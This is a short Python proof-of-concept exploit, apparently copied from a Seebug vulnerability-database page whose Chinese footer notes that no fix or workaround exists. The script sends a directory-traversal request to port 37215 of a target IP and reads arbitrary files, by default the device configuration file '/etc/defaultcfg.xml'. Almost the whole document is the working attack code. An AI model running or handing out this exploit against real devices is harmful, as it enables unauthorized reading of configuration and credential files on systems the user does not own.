""" Authors: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick) """ import logging import sys import urllib2 DEFAULT_HEADERS = {"User-Agent": "Mozilla", } DEFAULT_TIMEOUT = 5 def fetch_url(url): global DEFAULT_HEADERS, DEFAULT_TIMEOUT request = urllib2.Request(url, headers=DEFAULT_HEADERS) try: data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read() except Exception, e: logging.error("Exception: %s", e) data = None return data def exploit(ip, path): url = "http://%s:37215/icon/../../../%s" % (ip, path) data = fetch_url(url) return data def main(): targetip = sys.argv[1] if len(sys.argv) > 2: path = sys.argv[2].strip() else: path = "/etc/defaultcfg.xml" assert path.startswith("/"), "An absolute path is required" data = exploit(targetip, path) if data is None: logging.error("Exploit failed") exit(-1) # Successful print data if __name__ == "__main__": main()
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论